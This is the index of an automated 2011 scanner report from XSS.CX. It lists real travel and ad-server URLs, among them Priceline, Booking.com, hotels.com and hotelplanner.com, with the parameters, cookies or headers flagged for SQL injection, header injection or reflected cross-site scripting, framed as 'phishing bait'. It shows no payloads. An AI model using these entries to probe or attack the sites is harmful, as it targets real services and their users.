XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10022011-02

Travel Industry Segmented Report with respect to Phishing Bait

Report generated by XSS.CX at Sun Oct 02 21:15:06 CDT 2011.


1. SQL injection

1.1. http://ad.yieldmanager.com/imp [atf parameter]

1.2. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH [JEB2 cookie]

1.3. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH [REST URL parameter 1]

1.4. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH [Referer HTTP header]

1.5. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH [User-Agent HTTP header]

1.6. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH [JEB2 cookie]

1.7. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH [loc parameter]

1.8. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH [REST URL parameter 1]

1.9. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH [User-Agent HTTP header]

1.10. http://adserver.adtech.de/addyn|3.0|999|3106006|0|168|ADTECH [name of an arbitrarily supplied request parameter]

1.11. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176 [NGUserID cookie]

1.12. http://www.hotels.com/compare/hotel_dockingbar.html [SSPV cookie]

1.13. http://www.hotels.com/compare/hotel_dockingbar.html [SSRT cookie]

1.14. http://www.hotels.com/compare/hotel_dockingbar.html [__utmc cookie]

1.15. http://www.hotels.com/compare/hotel_dockingbar.html [name of an arbitrarily supplied request parameter]

1.16. http://www.hotels.com/hotel/details.html [REST URL parameter 2]

1.17. http://www.hotels.com/hotel/details.html [__utmc cookie]

1.18. http://www.hotels.com/hotel/details.html [channel cookie]

1.19. http://www.hotels.com/hotel/details.html [guid cookie]

1.20. http://www.hotels.com/hotel/hoteldata.html [__utmc cookie]

1.21. http://www.hotels.com/hoteldetails/urgencypopup.html [REST URL parameter 2]

1.22. http://www.hotels.com/hoteldetails/urgencypopup.html [mvthistory cookie]

1.23. http://www.revresda.com/event.ng/Type=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/ [REST URL parameter 2]

1.24. http://www.revresda.com/event.ng/Type=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html [REST URL parameter 2]

2. XPath injection

3. HTTP header injection

3.1. http://ad.doubleclick.net/getcamphist [src parameter]

3.2. http://kantarmedia.guardian.co.uk/RealMedia/ads/adstream.cap [476949646137654800&c parameter]

4. Cross-site scripting (reflected)

4.1. http://a.collective-media.net/adj/cm.guardian/ [REST URL parameter 2]

4.2. http://a.collective-media.net/adj/cm.guardian/ [name of an arbitrarily supplied request parameter]

4.3. http://a.collective-media.net/adj/cm.guardian/ [sz parameter]

4.4. http://a.collective-media.net/cmadj/cm.guardian/ [REST URL parameter 2]

4.5. http://a.collective-media.net/cmadj/cm.guardian/ [sz parameter]

4.6. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]

4.7. http://ad.turn.com/server/pixel.htm [fpid parameter]

4.8. http://ad.turn.com/server/pixel.htm [sp parameter]

4.9. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.10. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.11. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [loc parameter]

4.12. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [loc parameter]

4.13. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [name of an arbitrarily supplied request parameter]

4.14. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [name of an arbitrarily supplied request parameter]

4.15. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [loc parameter]

4.16. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [loc parameter]

4.17. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [name of an arbitrarily supplied request parameter]

4.18. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [name of an arbitrarily supplied request parameter]

4.19. http://api.bizographics.com/v2/profile.redirect [api_key parameter]

4.20. http://api.wipmania.com/jsonp [callback parameter]

4.21. http://ar.voicefive.com/b/rc.pli [func parameter]

4.22. http://as.chango.com/links/adunit/1.31759988192e+12 [adpos parameter]

4.23. http://as.chango.com/links/adunit/1.31759988192e+12 [atype parameter]

4.24. http://as.chango.com/links/adunit/1.31759988192e+12 [bidder parameter]

4.25. http://as.chango.com/links/adunit/1.31759988192e+12 [datc parameter]

4.26. http://as.chango.com/links/adunit/1.31759988192e+12 [dc parameter]

4.27. http://as.chango.com/links/adunit/1.31759988192e+12 [dom parameter]

4.28. http://as.chango.com/links/adunit/1.31759988192e+12 [eid parameter]

4.29. http://as.chango.com/links/adunit/1.31759988192e+12 [ht parameter]

4.30. http://as.chango.com/links/adunit/1.31759988192e+12 [ibs parameter]

4.31. http://as.chango.com/links/adunit/1.31759988192e+12 [poo parameter]

4.32. http://as.chango.com/links/adunit/1.31759988192e+12 [sid parameter]

4.33. http://as.chango.com/links/adunit/1.31759988192e+12 [sig parameter]

4.34. http://as.chango.com/links/adunit/1.31759988192e+12 [st parameter]

4.35. http://as.chango.com/links/adunit/1.31759988192e+12 [stid parameter]

4.36. http://as.chango.com/links/adunit/1.31759988192e+12 [url parameter]

4.37. http://as.chango.com/links/adunit/1.31759988192e+12 [wh parameter]

4.38. http://as00.estara.com/as/InitiateCall2.php [template parameter]

4.39. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.40. http://b.scorecardresearch.com/beacon.js [c10 parameter]

4.41. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.42. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.43. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.44. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.45. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.46. http://bid.openx.net/json [c parameter]

4.47. http://d.tradex.openx.com/afr.php [cb parameter]

4.48. http://d.tradex.openx.com/afr.php [loc parameter]

4.49. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]

4.50. http://d.tradex.openx.com/afr.php [zoneid parameter]

4.51. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers [mid parameter]

4.52. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers [mid parameter]

4.53. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf [mid parameter]

4.54. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf [mid parameter]

4.55. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 2]

4.56. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 3]

4.57. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 4]

4.58. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 5]

4.59. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 6]

4.60. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 7]

4.61. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [name of an arbitrarily supplied request parameter]

4.62. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [redir parameter]

4.63. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [sz parameter]

4.64. http://goal.us.intellitxt.com/al.asp [jscallback parameter]

4.65. http://goal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

4.66. http://goal.us.intellitxt.com/v4/init [jscallback parameter]

4.67. http://goal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

4.68. http://ib.adnxs.com/ab [ccd parameter]

4.69. http://ib.adnxs.com/ab [cnd parameter]

4.70. http://ib.adnxs.com/ab [referrer parameter]

4.71. http://ib.adnxs.com/ab [tt_code parameter]

4.72. http://js.revsci.net/gateway/gw.js [csid parameter]

4.73. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3 [REST URL parameter 4]

4.74. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3 [REST URL parameter 5]

4.75. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3 [name of an arbitrarily supplied request parameter]

4.76. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard [mbox parameter]

4.77. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/mbox/standard [mbox parameter]

4.78. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard [mbox parameter]

4.79. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard [mboxId parameter]

4.80. http://otter.topsy.com/stats.js [url parameter]

4.81. https://secure.mlb.com/style/nav_2011.jsp [section parameter]

4.82. http://servedby.flashtalking.com/imp/1/16628 [183799;201;js;BarclaysPremierLeague;RONMPU/?click parameter]

4.83. http://servedby.flashtalking.com/imp/1/16628 [cachebuster parameter]

4.84. http://servedby.flashtalking.com/imp/1/16628 [ftadz parameter]

4.85. http://servedby.flashtalking.com/imp/1/16628 [ftscw parameter]

4.86. http://servedby.flashtalking.com/imp/1/16628 [ftx parameter]

4.87. http://servedby.flashtalking.com/imp/1/16628 [fty parameter]

4.88. http://servedby.flashtalking.com/imp/1/16628 [name of an arbitrarily supplied request parameter]

4.89. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

4.90. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

4.91. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

4.92. http://static.igougo.com/traveldeals/iAuto.aspx [REST URL parameter 1]

4.93. http://tacoda-fatcat.search.aol.com/fa/eval [att parameter]

4.94. http://tacoda-fatcat.search.aol.com/fa/eval [query parameter]

4.95. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

4.96. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

4.97. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

4.98. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

4.99. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

4.100. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

4.101. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

4.102. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

4.103. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

4.104. http://travela.priceline.com/hotel/newHotelSearch.do [checkInDate parameter]

4.105. http://travela.priceline.com/hotel/newHotelSearch.do [checkInDate parameter]

4.106. http://travela.priceline.com/hotel/newHotelSearch.do [checkOutDate parameter]

4.107. http://travela.priceline.com/hotel/newHotelSearch.do [checkOutDate parameter]

4.108. http://travela.priceline.com/hotel/newHotelSearch.do [noWait parameter]

4.109. http://travela.priceline.com/hotel/searchHotels.do [CkInDay parameter]

4.110. http://travela.priceline.com/hotel/searchHotels.do [CkInMonth parameter]

4.111. http://travela.priceline.com/hotel/searchHotels.do [CkInYear parameter]

4.112. http://travela.priceline.com/hotel/searchHotels.do [CkOutDay parameter]

4.113. http://travela.priceline.com/hotel/searchHotels.do [CkOutMonth parameter]

4.114. http://travela.priceline.com/hotel/searchHotels.do [CkOutYear parameter]

4.115. http://travela.priceline.com/hotel/searchHotels.do [Initialized parameter]

4.116. http://travela.priceline.com/hotel/searchHotels.do [KMode parameter]

4.117. http://travela.priceline.com/hotel/searchHotels.do [RefClickID parameter]

4.118. http://travela.priceline.com/hotel/searchHotels.do [RefID parameter]

4.119. http://travela.priceline.com/hotel/searchHotels.do [affiliateSubID parameter]

4.120. http://travela.priceline.com/hotel/searchHotels.do [checkInDate parameter]

4.121. http://travela.priceline.com/hotel/searchHotels.do [checkInDate parameter]

4.122. http://travela.priceline.com/hotel/searchHotels.do [checkOutDate parameter]

4.123. http://travela.priceline.com/hotel/searchHotels.do [checkOutDate parameter]

4.124. http://travela.priceline.com/hotel/searchHotels.do [cityName parameter]

4.125. http://travela.priceline.com/hotel/searchHotels.do [homepage parameter]

4.126. http://travela.priceline.com/hotel/searchHotels.do [hotelBrand parameter]

4.127. http://travela.priceline.com/hotel/searchHotels.do [hotelBrand parameter]

4.128. http://travela.priceline.com/hotel/searchHotels.do [name of an arbitrarily supplied request parameter]

4.129. http://travela.priceline.com/hotel/searchHotels.do [name of an arbitrarily supplied request parameter]

4.130. http://travela.priceline.com/hotel/searchHotels.do [numberOfRooms parameter]

4.131. http://travela.priceline.com/hotel/searchHotels.do [numberOfRooms parameter]

4.132. http://travela.priceline.com/hotel/searchHotels.do [otherCityName parameter]

4.133. http://travela.priceline.com/hotel/searchHotels.do [passingValues parameter]

4.134. http://travela.priceline.com/hotel/searchHotels.do [plf parameter]

4.135. http://travela.priceline.com/hotel/searchHotels.do [plf parameter]

4.136. http://travela.priceline.com/hotel/searchHotels.do [refclickid parameter]

4.137. http://travela.priceline.com/hotel/searchHotels.do [refid parameter]

4.138. http://travela.priceline.com/hotel/searchHotels.do [searchHotelName parameter]

4.139. http://travela.priceline.com/hotel/searchHotels.do [searchHotelName parameter]

4.140. http://travela.priceline.com/hotel/searchHotels.do [searchType parameter]

4.141. http://travela.priceline.com/hotel/searchHotels.do [session_key parameter]

4.142. http://travela.priceline.com/hotel/searchHotels.do [session_key parameter]

4.143. http://travela.priceline.com/hotel/searchHotels.do [starRating parameter]

4.144. http://travela.priceline.com/hotel/searchHotels.do [starRating parameter]

4.145. http://travela.priceline.com/hotel/searchHotels_process.do [checkInDate parameter]

4.146. http://travela.priceline.com/hotel/searchHotels_process.do [checkInDate parameter]

4.147. http://travela.priceline.com/hotel/searchHotels_process.do [checkOutDate parameter]

4.148. http://travela.priceline.com/hotel/searchHotels_process.do [checkOutDate parameter]

4.149. http://travela.priceline.com/hotel/searchHotels_process.do [key parameter]

4.150. http://travela.priceline.com/hotel/searchHotels_process.do [key parameter]

4.151. http://travela.priceline.com/hotel/searchHotels_process.do [key parameter]

4.152. http://travela.priceline.com/hotel/searchHotels_process.do [numberOfRooms parameter]

4.153. http://travela.priceline.com/hotel/searchHotels_process.do [numberOfRooms parameter]

4.154. http://travela.priceline.com/hotel/searchResults.do [key parameter]

4.155. http://travela.priceline.com/hotel/searchResults.do [key parameter]

4.156. http://travela.priceline.com/hotel/searchResults.do [key parameter]

4.157. http://www.agoda.com/pages/agoda/default/page_AdScript.aspx [conversionID parameter]

4.158. http://www.agoda.com/pages/agoda/default/page_AdScript.aspx [conversionLabel parameter]

4.159. http://www.aon.com/site/search.jsp [q parameter]

4.160. http://www.aon.com/site/search.jsp [q parameter]

4.161. http://www.aon.com/site/search.jsp [q parameter]

4.162. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 1]

4.163. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 1]

4.164. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 2]

4.165. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 2]

4.166. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 3]

4.167. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 3]

4.168. http://www.booking.com/hotel/us/c-boston-massachusettes.html [aid parameter]

4.169. http://www.booking.com/hotel/us/c-boston-massachusettes.html [aid parameter]

4.170. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_monthday parameter]

4.171. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_monthday parameter]

4.172. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_year_month parameter]

4.173. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_year_month parameter]

4.174. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_monthday parameter]

4.175. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_monthday parameter]

4.176. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_year_month parameter]

4.177. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_year_month parameter]

4.178. http://www.booking.com/hotel/us/c-boston-massachusettes.html [do_availability_check parameter]

4.179. http://www.booking.com/hotel/us/c-boston-massachusettes.html [do_availability_check parameter]

4.180. http://www.booking.com/hotel/us/c-boston-massachusettes.html [label parameter]

4.181. http://www.booking.com/hotel/us/c-boston-massachusettes.html [label parameter]

4.182. http://www.booking.com/hotel/us/c-boston-massachusettes.html [lang parameter]

4.183. http://www.booking.com/hotel/us/c-boston-massachusettes.html [lang parameter]

4.184. http://www.booking.com/hotel/us/c-boston-massachusettes.html [name of an arbitrarily supplied request parameter]

4.185. http://www.booking.com/hotel/us/c-boston-massachusettes.html [name of an arbitrarily supplied request parameter]

4.186. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_content parameter]

4.187. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_content parameter]

4.188. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_medium parameter]

4.189. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_medium parameter]

4.190. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_source parameter]

4.191. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_source parameter]

4.192. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_term parameter]

4.193. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_term parameter]

4.194. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 1]

4.195. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 1]

4.196. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 2]

4.197. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 2]

4.198. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 3]

4.199. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 3]

4.200. http://www.booking.com/hotel/us/copley-square.en-us.html [aid parameter]

4.201. http://www.booking.com/hotel/us/copley-square.en-us.html [aid parameter]

4.202. http://www.booking.com/hotel/us/copley-square.en-us.html [name of an arbitrarily supplied request parameter]

4.203. http://www.booking.com/hotel/us/copley-square.en-us.html [name of an arbitrarily supplied request parameter]

4.204. http://www.booking.com/load_times [REST URL parameter 1]

4.205. http://www.booking.com/load_times [REST URL parameter 1]

4.206. http://www.booking.com/logo [REST URL parameter 1]

4.207. http://www.booking.com/logo [REST URL parameter 1]

4.208. http://www.booking.com/searchresults.html [REST URL parameter 1]

4.209. http://www.booking.com/searchresults.html [REST URL parameter 1]

4.210. http://www.booking.com/searchresults.html [aid parameter]

4.211. http://www.booking.com/searchresults.html [aid parameter]

4.212. http://www.booking.com/searchresults.html [checkin_monthday parameter]

4.213. http://www.booking.com/searchresults.html [checkin_monthday parameter]

4.214. http://www.booking.com/searchresults.html [checkin_year_month parameter]

4.215. http://www.booking.com/searchresults.html [checkin_year_month parameter]

4.216. http://www.booking.com/searchresults.html [checkout_monthday parameter]

4.217. http://www.booking.com/searchresults.html [checkout_monthday parameter]

4.218. http://www.booking.com/searchresults.html [checkout_year_month parameter]

4.219. http://www.booking.com/searchresults.html [checkout_year_month parameter]

4.220. http://www.booking.com/searchresults.html [city parameter]

4.221. http://www.booking.com/searchresults.html [city parameter]

4.222. http://www.booking.com/searchresults.html [do_availability_check parameter]

4.223. http://www.booking.com/searchresults.html [do_availability_check parameter]

4.224. http://www.booking.com/searchresults.html [label parameter]

4.225. http://www.booking.com/searchresults.html [label parameter]

4.226. http://www.booking.com/searchresults.html [name of an arbitrarily supplied request parameter]

4.227. http://www.booking.com/searchresults.html [name of an arbitrarily supplied request parameter]

4.228. http://www.booking.com/searchresults.html [utm_campaign parameter]

4.229. http://www.booking.com/searchresults.html [utm_campaign parameter]

4.230. http://www.booking.com/searchresults.html [utm_medium parameter]

4.231. http://www.booking.com/searchresults.html [utm_medium parameter]

4.232. http://www.booking.com/searchresults.html [utm_source parameter]

4.233. http://www.booking.com/searchresults.html [utm_source parameter]

4.234. http://www.booking.com/searchresults.html [utm_term parameter]

4.235. http://www.booking.com/searchresults.html [utm_term parameter]

4.236. http://www.expedia.com/Hotel-Search [hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity parameter]

4.237. http://www.expedia.com/Hotel-Search [hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity parameter]

4.238. http://www.goal.com/en/comment/comments-box [allCommentsUrl parameter]

4.239. http://www.goal.com/en/teams/england/97/man-utd-news [REST URL parameter 5]

4.240. http://www.hotelplanner.com/ClickThrough.cfm [Source parameter]

4.241. http://www.hotelplanner.com/ClickThrough.cfm [Source parameter]

4.242. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [NumRooms parameter]

4.243. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [NumRooms parameter]

4.244. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [NumRooms parameter]

4.245. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hotelID parameter]

4.246. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hotelID parameter]

4.247. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hotelID parameter]

4.248. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hrnQuoteKey parameter]

4.249. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [inDate parameter]

4.250. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [name of an arbitrarily supplied request parameter]

4.251. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [outDate parameter]

4.252. http://www.hotelplanner.com/Impressions.cfm [Ad_ID parameter]

4.253. http://www.hotelplanner.com/Impressions.cfm [Ad_ID parameter]

4.254. http://www.hotelplanner.com/Impressions.cfm [Ad_ID parameter]

4.255. http://www.hotelplanner.com/Search/Index.cfm [City parameter]

4.256. http://www.hotelplanner.com/Search/Index.cfm [Country parameter]

4.257. http://www.hotelplanner.com/Search/Index.cfm [InDate parameter]

4.258. http://www.hotelplanner.com/Search/Index.cfm [InDate parameter]

4.259. http://www.hotelplanner.com/Search/Index.cfm [NumRooms parameter]

4.260. http://www.hotelplanner.com/Search/Index.cfm [OutDate parameter]

4.261. http://www.hotelplanner.com/Search/Index.cfm [OutDate parameter]

4.262. http://www.hotelplanner.com/Search/Index.cfm [State parameter]

4.263. http://www.hotelplanner.com/Search/Index.cfm [adults parameter]

4.264. http://www.hotelplanner.com/Search/Index.cfm [name of an arbitrarily supplied request parameter]

4.265. http://www.hotelplanner.com/Search/Index.cfm [sc parameter]

4.266. http://www.hotelplanner.com/Search/index.cfm [HotelName parameter]

4.267. http://www.hotelplanner.com/Search/index.cfm [NumRooms parameter]

4.268. http://www.hotelplanner.com/Search/index.cfm [PriceMax parameter]

4.269. http://www.hotelplanner.com/Search/index.cfm [PriceMin parameter]

4.270. http://www.hotelplanner.com/Search/index.cfm [Rating parameter]

4.271. http://www.hotelplanner.com/Search/index.cfm [ViewType parameter]

4.272. http://www.hotelplanner.com/Search/index.cfm [btnGo.x parameter]

4.273. http://www.hotelplanner.com/Search/index.cfm [btnGo.y parameter]

4.274. https://www.hotelplanner.com/Accept/Reserve.cfm [DisplayNightlyRates parameter]

4.275. https://www.hotelplanner.com/Accept/Reserve.cfm [HotelName parameter]

4.276. https://www.hotelplanner.com/Accept/Reserve.cfm [NativeNightlyRates parameter]

4.277. https://www.hotelplanner.com/Accept/Reserve.cfm [ValueAdds parameter]

4.278. https://www.hotelplanner.com/Accept/Reserve.cfm [ValueAdds parameter]

4.279. https://www.hotelplanner.com/Accept/Reserve.cfm [arrivalDay parameter]

4.280. https://www.hotelplanner.com/Accept/Reserve.cfm [arrivalMonth parameter]

4.281. https://www.hotelplanner.com/Accept/Reserve.cfm [arrivalYear parameter]

4.282. https://www.hotelplanner.com/Accept/Reserve.cfm [bedType parameter]

4.283. https://www.hotelplanner.com/Accept/Reserve.cfm [bedTypes parameter]

4.284. https://www.hotelplanner.com/Accept/Reserve.cfm [bedTypes parameter]

4.285. https://www.hotelplanner.com/Accept/Reserve.cfm [cancellationPolicy parameter]

4.286. https://www.hotelplanner.com/Accept/Reserve.cfm [cancellationPolicy parameter]

4.287. https://www.hotelplanner.com/Accept/Reserve.cfm [chargeableRoomRateTaxesAndFees parameter]

4.288. https://www.hotelplanner.com/Accept/Reserve.cfm [chargeableRoomRateTotal parameter]

4.289. https://www.hotelplanner.com/Accept/Reserve.cfm [departureDay parameter]

4.290. https://www.hotelplanner.com/Accept/Reserve.cfm [departureMonth parameter]

4.291. https://www.hotelplanner.com/Accept/Reserve.cfm [departureYear parameter]

4.292. https://www.hotelplanner.com/Accept/Reserve.cfm [depositRequired parameter]

4.293. https://www.hotelplanner.com/Accept/Reserve.cfm [displayCurrencyCode parameter]

4.294. https://www.hotelplanner.com/Accept/Reserve.cfm [displayRoomRate parameter]

4.295. https://www.hotelplanner.com/Accept/Reserve.cfm [extraPersonFees parameter]

4.296. https://www.hotelplanner.com/Accept/Reserve.cfm [guaranteeRequired parameter]

4.297. https://www.hotelplanner.com/Accept/Reserve.cfm [hotelID parameter]

4.298. https://www.hotelplanner.com/Accept/Reserve.cfm [hrnQuoteKey parameter]

4.299. https://www.hotelplanner.com/Accept/Reserve.cfm [immediateChargeRequired parameter]

4.300. https://www.hotelplanner.com/Accept/Reserve.cfm [locale parameter]

4.301. https://www.hotelplanner.com/Accept/Reserve.cfm [nativeCurrencyCode parameter]

4.302. https://www.hotelplanner.com/Accept/Reserve.cfm [nativeRoomRate parameter]

4.303. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfAdults parameter]

4.304. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfAdults parameter]

4.305. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfChildren parameter]

4.306. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfChildren parameter]

4.307. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfRooms parameter]

4.308. https://www.hotelplanner.com/Accept/Reserve.cfm [promoDescription parameter]

4.309. https://www.hotelplanner.com/Accept/Reserve.cfm [promoDescription parameter]

4.310. https://www.hotelplanner.com/Accept/Reserve.cfm [promoType parameter]

4.311. https://www.hotelplanner.com/Accept/Reserve.cfm [propertyID parameter]

4.312. https://www.hotelplanner.com/Accept/Reserve.cfm [propertyType parameter]

4.313. https://www.hotelplanner.com/Accept/Reserve.cfm [rateChange parameter]

4.314. https://www.hotelplanner.com/Accept/Reserve.cfm [rateCode parameter]

4.315. https://www.hotelplanner.com/Accept/Reserve.cfm [rateDescription parameter]

4.316. https://www.hotelplanner.com/Accept/Reserve.cfm [rateFrequency parameter]

4.317. https://www.hotelplanner.com/Accept/Reserve.cfm [roomTypeCode parameter]

4.318. https://www.hotelplanner.com/Accept/Reserve.cfm [roomTypeDescription parameter]

4.319. https://www.hotelplanner.com/Accept/Reserve.cfm [roomTypeDescription parameter]

